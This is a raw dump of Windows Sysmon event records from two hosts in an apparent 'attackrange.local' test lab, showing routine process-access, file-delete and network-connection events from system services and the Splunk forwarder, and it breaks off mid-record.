12:22:40.108{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439993Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:40.108{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291339Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:41.809{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC7687D456575F3FCE0D0EACC62CA5E,SHA256=0ADF127F22D69265B655CC768C475EEBEE0179F97EB856815F51ED641D432B1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439998Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:41.542{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CCA7FAA62997B4B52E1737E09AD6CE9,SHA256=2B3CB4C4D1B749214BC4F7B78BD5EE77DA75E37A8A0208000E070295AC964B01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439997Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:41.109{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439996Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:41.109{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291340Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:42.810{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A68FBE447DBD91539EAA79563B5B26BE,SHA256=24D590A2463889324A338E2E906615AD8B22549E7AA5C6AB390D54A9C300F88B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440001Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:42.576{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=354A78241736BA316AF95C9728AA5E28,SHA256=88812855EA5FD8ECA5DA67C6EFCF3F5FD426C6FF52826BB33E0498ECFB8CF072,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440000Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:42.110{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439999Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:42.110{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291341Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:43.811{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF580D633D0C46901A55F0501186FEEC,SHA256=C05E13856AD7450B12B9BB75F352865517CFC1D286A6C990A218359DFDDC54AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440007Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:40.677{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62387-false10.0.1.12-8000- 23542300x8000000000000000440006Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:43.598{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A883A10DBD345993586A2FFBD276036,SHA256=1EC85DA40D21CEFB49C49D9751960B119CBF6573CB56C61CB2C4BC6B0AC066B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440005Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:43.242{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B3C622892D9EFD0735919330D4CD2C3,SHA256=08AAC8B68CDA0AAF637E9FF9AB7E6FFE17CFABB242F6E305D43F5D07D39E3B27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440004Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:43.241{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C73FD208D0B614DBBE7B163E9E46A757,SHA256=06F319E8A554AA84D19A89D99C2CC73328498E5A1D5ADF5691F237DE04D10789,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440003Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:43.111{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440002Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:43.111{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440010Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:44.609{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=591FC252B00D48A2C08D6FE48AFC82FA,SHA256=DAD27C535C946A5A427FA3A8CC55459D24B5697AACD31022E391A33337EFCD31,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291345Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:42.506{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50606-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291344Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:44.812{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E6CCB75B60E8DE93349799EB6B9B5AE,SHA256=F7AEAC7FFDBA008BFBF919BA4C4772F9835019AACBB7948F457B522887DEC015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291343Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:44.342{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85DAC4DCF581287B2F0B5D0E04EED1AF,SHA256=A71DC48ACCA50DC5463EFC24772E9F6085BF6672509D995FC98E728BC0B415B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291342Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:44.342{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A04F90E0B3D082C7DE3F2032EDB0201E,SHA256=AA756C142C43E72E53BE573217AFF15DC796B6386941636899063F0ADC4EFAB2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440009Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:44.112{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440008Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:44.112{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440013Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:45.834{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95B96CC32D7988D7AC547C52C17880AD,SHA256=C808554EC789B33AC8CF23A2AB41224724220D374E4788A8DE140A375EB0074C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291346Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:45.812{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C932272964E278AD6EF71B22DF073D5,SHA256=308B3187D24990946D4412AF9FD73192D18DE6DC38CC46D269436FEFBD501353,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440012Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:45.113{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440011Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:45.113{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440042Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.877{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0216-6088-B428-00000000BA01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440041Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.876{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440040Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.876{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440039Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.876{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440038Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.876{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440037Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.876{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440036Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.876{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440035Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.876{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440034Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 